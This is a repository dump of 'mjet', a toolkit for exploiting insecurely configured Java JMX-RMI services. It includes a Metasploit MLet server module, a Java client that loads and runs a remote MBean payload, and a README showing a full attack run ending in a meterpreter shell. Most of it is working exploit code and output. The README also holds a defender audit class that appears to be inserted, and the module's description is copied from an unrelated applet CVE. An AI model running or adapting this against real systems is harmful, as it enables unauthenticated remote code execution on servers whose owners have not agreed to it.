Repository: mogwaisec/mjet
Branch: master
Commit: 20210c1286a9
Files: 15
Total size: 14.5 KB
Directory structure:
gitextract_d35drckt/
├── LICENSE
├── README.md
├── metasploit/
│ └── java_mlet_server.rb
├── mjet.jar
└── src/
└── java/
├── metasploit/
│ └── MetasploitBean/
│ ├── .classpath
│ ├── .project
│ ├── .settings/
│ │ └── org.eclipse.jdt.core.prefs
│ └── src/
│ └── metasploit/
│ ├── Metasploit.java
│ ├── MetasploitMBean.java
│ └── Payload.java
└── mjet/
├── .classpath
├── .project
├── .settings/
│ └── org.eclipse.jdt.core.prefs
├── lib/
│ └── commons-cli-1.2.jar
└── src/
└── de/
└── mogwaisecurity/
└── lab/
└── mjet/
└── Mjet.java
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE
================================================
The MIT License (MIT)
Copyright (c) 2015 Mogwai Security
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
# mjet
Mogwai Security Java Management Extensions (JMX) Exploitation Toolkit
mjet is a tool that can be used to protect insecurely configured JMX services. It is based on
the blog post ["Exploiting JMX-RMI"](http://www.accuvant.com/blog/exploiting-jmx-rmi) by Braden Thomas/Accuvant
and can be used to execute arbitrary Metasploit payloads on the target system.

Mjet was originally planned to be a complete attack toolkit. However, we noticed that the Metasploit GitHub repository contains
a pull request which will provide basic Java RMI/serialization support in native Ruby. This is awesome and removes the Java
dependency, so we stopped developing this tool and will create Metasploit modules in the near future.
mjet consists of the following parts:

- A Metasploit module which emulates an "MLet server". This is basically a web server which hosts an HTML file that contains an MLET tag
- A managed bean (MBean) that is modified by the MLet server module to include the selected payload
- A jar archive that is used to contact the insecure JMX service.
### Installation (with the github version of Metasploit)
- Copy the "MBean" folder to "data/java/metasploit"
- Copy java_mlet_server.rb to "modules/exploits/multi/misc/"
### Usage
The example uses the following systems:

- attacker: 192.168.178.1
- target: 192.168.178.200, JMX service running on TCP port 1616

- Configure/start the Metasploit module "java_mlet_server". The module will run as a background job:
```
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run
```
- Use mjet.jar to connect to the vulnerable JMX service and provide the URL of the MLet web server:
```
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164 5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done
```
and enjoy your meterpreter shell :-)
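As an added defender-side counterpart that is not part of mjet or Metasploit: a Java audit that lists the MBeans of a server and flags any MLet instance, or any MBean exposing the `getMBeansFromURL` operation the run above invokes. The class `MLetAudit` and its argument handling are assumptions; with no arguments it audits an in-process MBeanServer seeded with an MLet, so it runs offline.

```java
import java.util.Set;
import java.util.TreeSet;
import javax.management.*;
import javax.management.loading.MLet;
import javax.management.remote.JMXConnector;
import javax.management.remote.JMXConnectorFactory;
import javax.management.remote.JMXServiceURL;

/** Audit helper (hypothetical, not part of mjet): flags MBeans able to load code from a URL. */
public class MLetAudit {
    /** Every registered MBean that is an MLet (or a subclass such as PrivateMLet)
     *  or that exposes the getMBeansFromURL operation mjet invokes. */
    public static Set<ObjectName> findCodeLoadingBeans(MBeanServerConnection server) throws Exception {
        Set<ObjectName> hits = new TreeSet<ObjectName>();
        for (ObjectName name : server.queryNames(null, null)) {
            if (server.isInstanceOf(name, "javax.management.loading.MLet")) {
                hits.add(name);
                continue;
            }
            for (MBeanOperationInfo op : server.getMBeanInfo(name).getOperations()) {
                if ("getMBeansFromURL".equals(op.getName())) {
                    hits.add(name);
                    break;
                }
            }
        }
        return hits;
    }

    public static void main(String[] args) throws Exception {
        MBeanServerConnection server;
        if (args.length == 2) {
            // Audit one of your own services at host/port, using the same service URL form as mjet;
            // if connect() succeeds with no credentials the connector is unauthenticated.
            JMXServiceURL url = new JMXServiceURL(
                "service:jmx:rmi:///jndi/rmi://" + args[0] + ":" + args[1] + "/jmxrmi");
            JMXConnector connector = JMXConnectorFactory.connect(url);
            server = connector.getMBeanServerConnection();
        } else {
            // Offline demonstration: an in-process MBeanServer seeded with the MLet that
            // createMBean("javax.management.loading.MLet", null) leaves registered.
            MBeanServer local = MBeanServerFactory.createMBeanServer();
            local.registerMBean(new MLet(), new ObjectName("DefaultDomain:type=MLet"));
            server = local;
        }
        Set<ObjectName> hits = findCodeLoadingBeans(server);
        for (ObjectName n : hits) System.out.println("[!] Code-loading MBean registered: " + n);
        if (hits.isEmpty()) System.out.println("[+] No MLet-capable MBeans registered");
    }
}
```

A credential-less connect succeeding in the two-argument mode means the connector is reachable exactly as the run above reaches it; the standard fix is `com.sun.management.jmxremote.authenticate=true` together with `com.sun.management.jmxremote.ssl=true`, or binding the connector to localhost only.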
================================================
FILE: metasploit/java_mlet_server.rb
================================================
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java Mlet Server',
      'Description'    => %q{
        This module abuses the JMX classes from a Java Applet to run arbitrary Java
        code outside of the sandbox as exploited in the wild in January of 2013. The
        vulnerability affects Java version 7u10 and earlier.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',      # Vulnerability discovery
          'egypt',        # Metasploit module
          'sinn3r',       # Metasploit module
          'juan vazquez'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-0422' ]
        ],
      'Platform'       => %w{ java linux osx win },
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 10 2013'
    ))
  end

  def setup
    path = File.join(Msf::Config.data_directory, "java", "metasploit", "MBean", "Metasploit.class")
    @mbean_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.data_directory, "java", "metasploit", "MBean", "MetasploitMBean.class")
    @interface_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    #@exploit_class_name = rand_text_alpha("Exploit".length)
    #@exploit_class.gsub!("Exploit", @exploit_class_name)
    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("metasploit/Metasploit.class", @mbean_class)
      jar.add_file("metasploit/MetasploitMBean.class", @interface_class)

      #metasploit_str = rand_text_alpha("metasploit".length)
      #payload_str = rand_text_alpha("payload".length)
      #jar.entries.each { |entry|
      #  entry.name.gsub!("metasploit", metasploit_str)
      #  entry.name.gsub!("Payload", payload_str)
      #  entry.data = entry.data.gsub("metasploit", metasploit_str)
      #  entry.data = entry.data.gsub("Payload", payload_str)
      #}
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html = %Q||
    # return html
  end

end
================================================
FILE: src/java/metasploit/MetasploitBean/.classpath
================================================
================================================
FILE: src/java/metasploit/MetasploitBean/.project
================================================
MetasploitBean
org.eclipse.jdt.core.javabuilder
org.eclipse.jdt.core.javanature
================================================
FILE: src/java/metasploit/MetasploitBean/.settings/org.eclipse.jdt.core.prefs
================================================
eclipse.preferences.version=1
org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6
org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
org.eclipse.jdt.core.compiler.compliance=1.6
org.eclipse.jdt.core.compiler.debug.lineNumber=generate
org.eclipse.jdt.core.compiler.debug.localVariable=generate
org.eclipse.jdt.core.compiler.debug.sourceFile=generate
org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
org.eclipse.jdt.core.compiler.source=1.6
================================================
FILE: src/java/metasploit/MetasploitBean/src/metasploit/Metasploit.java
================================================
package metasploit;

public class Metasploit implements MetasploitMBean {

    public void run() {
        Payload.main(null);
    }

}
================================================
FILE: src/java/metasploit/MetasploitBean/src/metasploit/MetasploitMBean.java
================================================
package metasploit;

public interface MetasploitMBean {
    public void run();
}
================================================
FILE: src/java/metasploit/MetasploitBean/src/metasploit/Payload.java
================================================
package metasploit;

public class Payload {

    public static void main(String[] args) {
        System.out.println("bla bla bla");
    }

}
================================================
FILE: src/java/mjet/.classpath
================================================
================================================
FILE: src/java/mjet/.project
================================================
mjet
org.eclipse.jdt.core.javabuilder
org.eclipse.jdt.core.javanature
================================================
FILE: src/java/mjet/.settings/org.eclipse.jdt.core.prefs
================================================
eclipse.preferences.version=1
org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6
org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
org.eclipse.jdt.core.compiler.compliance=1.6
org.eclipse.jdt.core.compiler.debug.lineNumber=generate
org.eclipse.jdt.core.compiler.debug.localVariable=generate
org.eclipse.jdt.core.compiler.debug.sourceFile=generate
org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
org.eclipse.jdt.core.compiler.source=1.6
================================================
FILE: src/java/mjet/src/de/mogwaisecurity/lab/mjet/Mjet.java
================================================
package de.mogwaisecurity.lab.mjet;

import org.apache.commons.cli.*;
import javax.management.remote.*;
import javax.management.*;
import java.util.*;

public class Mjet {

    /**
     * @param args
     */
    public static void main(String[] args) {
        System.out.println("---------------------------------------------------");
        System.out.println("MJET - Mogwai Security JMX Exploitation Toolkit 0.1");
        System.out.println("---------------------------------------------------");
        System.out.println();

        CommandLineParser parser = new org.apache.commons.cli.BasicParser();
        Options cmdOptions = createCmdOptions();
        CommandLine cmd = null;
        try {
            cmd = parser.parse(cmdOptions, args);
        }
        catch (ParseException exp) {
            System.err.println("[-] Error: " + exp.getMessage());
            System.err.println();
            // automatically generate the help statement
            HelpFormatter formatter = new HelpFormatter();
            formatter.printHelp("mjet", cmdOptions);
            System.exit(1);
        }

        pwnJMXService(cmd);
    }

    private static Options createCmdOptions()
    {
        Options cmdOptions = new Options();

        // Required arguments
        Option targetOption = OptionBuilder.withArgName("host").hasArg().withDescription("target host").isRequired(true).create('t');
        Option portOption = OptionBuilder.withArgName("port").hasArg().withDescription("target service port").isRequired(true).create('p');
        Option urlOption = OptionBuilder.withArgName("url").hasArg().withDescription("url of the mlet web server").isRequired(true).create('u');
        targetOption.setLongOpt("target");
        portOption.setLongOpt("port");
        urlOption.setLongOpt("url");
        cmdOptions.addOption(targetOption);
        cmdOptions.addOption(portOption);
        cmdOptions.addOption(urlOption);

        // Optional arguments
        Option helpOption = new Option("help", false, "show this help");
        cmdOptions.addOption(helpOption);

        return cmdOptions;
    }

    static void pwnJMXService(CommandLine line) {
        try {
            String serverName = line.getOptionValue("t");
            String servicePort = line.getOptionValue("p");
            String mLetUrl = line.getOptionValue("u");

            // Standard JMX-over-RMI service URL: the RMI registry on servicePort hands out the "jmxrmi" connector stub
            JMXServiceURL url = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + serverName + ":" + servicePort + "/jmxrmi");
            System.out.println("[+] Connecting to JMX URL: " + url + " ...");
            // No credentials are supplied; this only succeeds when the service runs without authentication
            JMXConnector connector = JMXConnectorFactory.connect(url);
            MBeanServerConnection mBeanServer = connector.getMBeanServerConnection();
            System.out.println("[+] Connected: " + connector.getConnectionId());

            ObjectInstance payloadBean = null;
            System.out.println("[+] Trying to create MLet bean...");
            ObjectInstance mLetBean = null;
            try {
                // MLet is the standard JMX class-loading MBean; with a null name it registers as DefaultDomain:type=MLet
                mLetBean = mBeanServer.createMBean("javax.management.loading.MLet", null);
            } catch (javax.management.InstanceAlreadyExistsException e) {
                // One is already registered (e.g. from an earlier run), so reuse it
                mLetBean = mBeanServer.getObjectInstance(new ObjectName("DefaultDomain:type=MLet"));
            }
            System.out.println("[+] Loaded " + mLetBean.getClassName());

            System.out.println("[+] Loading malicious MBean from " + mLetUrl);
            System.out.println("[+] Invoking: " + mLetBean.getClassName() + ".getMBeansFromURL");
            // getMBeansFromURL fetches the MLET file from the web server and registers the MBeans it references
            Object res = mBeanServer.invoke(mLetBean.getObjectName(), "getMBeansFromURL",
                new Object[] { mLetUrl },
                new String[] { String.class.getName() }
            );

            // The returned set holds either the ObjectInstances created or the Exception that occurred
            HashSet res_set = ((HashSet) res);
            Iterator itr = res_set.iterator();
            Object nextObject = itr.next();
            if (nextObject instanceof Exception) {
                throw ((Exception) nextObject);
            }
            payloadBean = ((ObjectInstance) nextObject);
            System.out.println("[+] Loaded class: " + payloadBean.getClassName());
            System.out.println("[+] Loaded MBean Server ID: " + payloadBean.getObjectName());

            System.out.println("[+] Invoking: " + payloadBean.getClassName() + ".run()");
            mBeanServer.invoke(payloadBean.getObjectName(), "run", new Object[]{}, new String[]{});
            System.out.println("[+] Done");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}